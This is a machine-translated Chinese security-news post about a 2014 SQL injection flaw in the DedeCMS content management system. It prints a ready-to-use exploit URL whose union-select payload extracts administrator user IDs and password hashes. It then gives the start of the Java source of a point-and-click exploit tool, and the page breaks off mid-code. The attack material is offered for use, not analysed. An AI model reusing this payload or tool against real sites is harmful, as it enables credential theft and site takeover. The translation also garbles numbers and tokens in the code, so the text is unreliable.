DedeCMS full version through the kill SQL injection exploit code and tools-vulnerability warning-the black bar safety net

2014-03-01T00:00:00
ID MYHACK58:62201442594
Type myhack58
Reporter 佚名
Modified 2014-03-01T00:00:00

Description

dedecms that weave the dream of PHP open source website content management system is. Woven dream content management system(DedeCms) in a simple, practical, open-source and famous, is domestic most well-known PHP open source website management system, is also using most users of PHP class CMS system, recently, the netizen in dedecms found in the full version of the pass to kill theSQL injectionvulnerabilities, currently the latest official version fixes the vulnerability related to the use of the code as follows:

EXP:

Exp:plus/recommend. php? action=&aid=1&_FILES[type][tmp_name]=\'

or mid=@`\" /! 50000union//! 50000select/1,2,3,(select

CONCAT(0x7c,userid,0x7c,pwd)+from+%2 3@__admin

limit+0,1),5,6,7,8,9%2 3@`\"+&_FILES[type][name]=1. jpg&_FILES[type]

[type]=application/octet-stream&_FILES[type][size]=1 1 1

The use of the tool source code(by the principal): the

package org. javaweb. dede. ui; import java. awt. Toolkit; import java. io. BufferedReader; import java. io. InputStreamReader; import java. net. URL; import java. util. regex. Matcher; import java. util. regex. Pattern; /**

*

  • @author yz

*/ public class MainFrame extends javax. swing. The JFrame {

private static final long serialVersionUID = 1L;

/**

  • Creates new form MainFrame

*/ public MainFrame() { initComponents(); }

public String request(String url){ String str = "",tmp; try { BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url). openStream())); while((tmp=br. readLine())!= null){ str+=tmp+"\r\n"; } } catch (Exception e) { jTextArea1. setText(e. toString()); } return str; }

private void initComponents() {

jPanel1 = new javax. swing. JPanel(); jLabel1 = new javax. swing. JLabel(); jTextField1 = new javax. swing. JTextField(); jButton1 = new javax. swing. JButton(); jScrollPane1 = new javax. swing. JScrollPane(); jTextArea1 = new javax. swing. JTextArea();

setDefaultCloseOperation(javax. swing. WindowConstants. EXIT_ON_CLOSE);

jLabel1. setText("URL:"); jTextField1. setText("http://localhost");

this. setTitle("DedeCms recommend. php injection exploit tool-p2j. cn");

int screenWidth = Toolkit. getDefaultToolkit(). getScreenSize(). width; int screenHeight = Toolkit. getDefaultToolkit(). getScreenSize(). height; this. setBounds(screenWidth / 2 - 2 2 9, screenHeight/ 2 - 1 5 8, 4 5 8, 3 1 6);

jButton1. setText("get"); jButton1. addActionListener(new java. awt. event. ActionListener() { public void actionPerformed(java. awt. event. ActionEvent evt) { jButton1ActionPerformed(evt); } });

jTextArea1. setColumns(2 0); jTextArea1. setRows(5); jScrollPane1. setViewportView(jTextArea1);

javax. swing. GroupLayout jPanel1Layout = new javax. swing. GroupLayout(jPanel1); jPanel1. setLayout(jPanel1Layout); jPanel1Layout. setHorizontalGroup( jPanel1Layout. createParallelGroup(javax. swing. GroupLayout. Alignment. LEADING) . addGroup(jPanel1Layout. createSequentialGroup() . addGroup(jPanel1Layout. createParallelGroup(javax. swing. GroupLayout. Alignment. TRAILING, false) . addComponent(jScrollPane1, javax. swing. GroupLayout. Alignment. LEADING) . addGroup(javax. swing. GroupLayout. Alignment. LEADING, jPanel1Layout. createSequentialGroup() . addContainerGap() . addComponent(jLabel1) . addPreferredGap(javax. swing. LayoutStyle. ComponentPlacement. RELATED) . addComponent(jTextField1, javax. swing. GroupLayout. PREFERRED_SIZE, 3 3 1, javax. swing. GroupLayout. PREFERRED_SIZE) . addPreferredGap(javax. swing. LayoutStyle. ComponentPlacement. RELATED) . addComponent(jButton1, javax. swing. GroupLayout. PREFERRED_SIZE, 8 3, javax. swing. GroupLayout. PREFERRED_SIZE))) . addGap(0, 0, Short. MAX_VALUE)) ); jPanel1Layout. setVerticalGroup( jPanel1Layout. createParallelGroup(javax. swing. GroupLayout. Alignment. LEADING) . addGroup(jPanel1Layout. createSequentialGroup() . addContainerGap() . addGroup(jPanel1Layout. createParallelGroup(javax. swing. GroupLayout. Alignment. BASELINE) . addComponent(jLabel1) . addComponent(jTextField1, javax. swing. GroupLayout. PREFERRED_SIZE,

[1] [2] next